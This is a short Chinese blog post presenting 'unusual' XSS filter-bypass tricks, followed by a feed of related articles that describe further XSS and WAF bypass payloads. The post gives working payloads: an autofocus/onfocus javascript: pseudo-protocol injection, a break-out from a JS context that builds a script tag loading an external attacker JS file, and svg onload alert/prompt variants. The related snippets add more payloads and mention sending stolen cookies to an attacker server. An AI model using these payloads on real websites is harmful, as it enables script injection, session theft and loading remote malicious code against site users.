这是一篇另类的XSS绕过奇招

最新推荐文章于 2025-03-17 17:37:45 发布
原创 最新推荐文章于 2025-03-17 17:37:45 发布 · 546 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #web

本文深入探讨了跨站脚本(XSS)攻击的几种高级技巧,包括如何绕过<>尖括号过滤,利用HTML及JS伪协议自动获取页面焦点触发恶意代码,以及在JS代码中创建新的script标签引入外部JS文件实现攻击目的。此外,还介绍了如何使用SVG标签结合onload事件触发alert或prompt弹窗,即使单引号被禁用也能成功执行。

1.过滤了<>尖括号: 

原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。

autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appendChild(s);”
 

2.漏洞已经在JS代码中,但是过滤了<>尖括号:  

原理:利用js代码创建新script标签,引入外接js文件,达到目的。

‘;s=document.createElement(“script”);s.src=”http:///xx.js”;document.body.appendChild(s);”

3. <svg/οnlοad=alert(‘1’)/>  

若’单引号被禁,alert(”)可用prompt()代替

<svg/οnlοad=prompt(1)/>

XSS攻击绕过方法以及绕过waf方法语句大全 XSS攻击语句这一篇足够
盾悟
12-31 1万+
1. 使用HTML实体编码 2. 大小写混合 3. 利用JavaScript事件 4. 利用URL编码 5. 使用不完整的HTML标签 6. 利用编码绕过 7. 使用不寻常的标签 8. 利用CDATA 9. 利用注释 10. 使用文档对象模型(DOM) 11. 利用HTML5功能 12. 使用特殊字符 13. 利用外部脚本 14. 使用IFrame 15. 利用CSS注入 16. 使用数据URI 17. 利用SVG 18. 使用Base64编码 19. 利用JavaScr
【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
xt350488的博客
07-22 3667
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
XSS绕过
weixin_33924770的博客
12-03 464
大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:&lt;、&gt;、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。 首先看一个JS的例子: 1 &lt;script&gt; 2     var s = "u003cu003e"; ...
XSS绕过姿势(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
08-14 937
以下姿势都是笔者在实战中经历过的,并且记录下来,时间可能比较久远具体的payload在实战中不一定能触发,但是绕过的思路还是以此基础进行改进的,这里笔者将一些payload在这里分享给各位师傅。
浅谈XSS攻击的那些事(附常用绕过姿势)
qq_42801460的博客
03-29 1763
有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另一个语句eval()来实现。由于盗取的cookie需要传回给攻击者,因此往往需要一个服务器来接收盗取的cookie,这也就是xss平台的作用了。也就是攻击相对于访问者而言是一次性的,具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。
XSS绕过姿势汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
05-25 309
一、更换JS引入方式 正常情况下,执行js代码有三种方法: 1、行间式 <div onclick="alert('yea...这样子可以执行JS哦')"></div> <a href="javascript:alert('执行JS代码但不跳转');">点我</a> <a href="javascript:void(0)" onclick="alert('点击执行JS代码');">再来点我啊</a> 2、外链式 <script
XSS绕过技术
10-11
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网页安全漏洞,攻击者通过在目标网站上注入恶意脚本代码,当其他用户浏览这些页面时,嵌入的恶意脚本将被执行,从而达到窃取信息、篡改页面内容、盗取cookies...
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 660
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...
xss绕过
weixin_51692662的博客
08-19 2835
xss绕过
XSS绕过姿势总结
nigo134的博客
07-16 3300
0x00 XSS基本测试流程 原则是“见框就插”,多动手,这里分享几个经典测试payload: "><svg/onload=alert(1)// 具体引用外部js的代码姿势是: <svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'// 在火狐浏览器下查看的效果(浏览器解析时会自动加上引号): <a href="javascript:alert(1)" >click me
奇葩XSS
weixin_33804990的博客
12-15 84
主要操作思路:更改数据包中的type值。 当type为空的页面时候返回html,虽然插入了xss代码并没有弹窗,如图更改type值,页面返回json数据当原本type就存在值怎么办呢,可以试试改变传输方式,将POST请求改成GET 附加一个~有时候添加一个新的参数,参数名就可能存在xss。 天天测试的日子,让人都恍惚了~ 转载于:https://blog.51cto.com/13539934...
XSS绕过总结
热门推荐
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
【奇淫技巧】mysql注入小技巧(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
A1_3_9_7的博客
03-17 1074
举例:通过布尔盲注的方法注当前登录用户名的第一位(这里是"r",ascii编码后是114),通过截取user字段第一位与爆破位置的数字进行比较,如果爆破位置数字小于114,就会触发溢出数据库报错,如果>=114就会回显正常,所以这里可以判断当前登录用户名的第一位ascii编码后是114,是"r"。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
xss靶场绕过
m0_63069714的博客
03-06 1653
首先尝试在标签中的name属性传递参数来观察,看哪个标签的有数据显示,看到的t_sort出现数据,但是仔细观察会发现,我们传递的" onclick=alert(1) type="text"参数中,双引号没有和前面的双引号发生闭合,因此我们需要找其他方式,使用火狐的hackbar插件,对t_ref属性进行传参,发现参数可以显示出来,因此再次尝试" onclick=alert(1) type="text",结果不出意料,实现弹窗。
xss绕过思路
W小哥
04-13 3589
1、前端限制绕过(比如:JS),直接抓包改包重放,或者修改html前端代码 2、大小写绕过,比如:pt> 4、使用注释进行干扰:<script>alert(/xss/)</script> 后台过滤了特殊字符,比如 ...
XSS绕过技巧揭秘与检测策略
XSS(跨站脚本攻击)绕过技术是一种针对Web应用程序的安全威胁,由论坛用户bystander在法克论坛分享。这种攻击利用了Web开发中的漏洞,允许攻击者将恶意代码注入到用户的浏览器中,从而获取未经授权的数据或权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值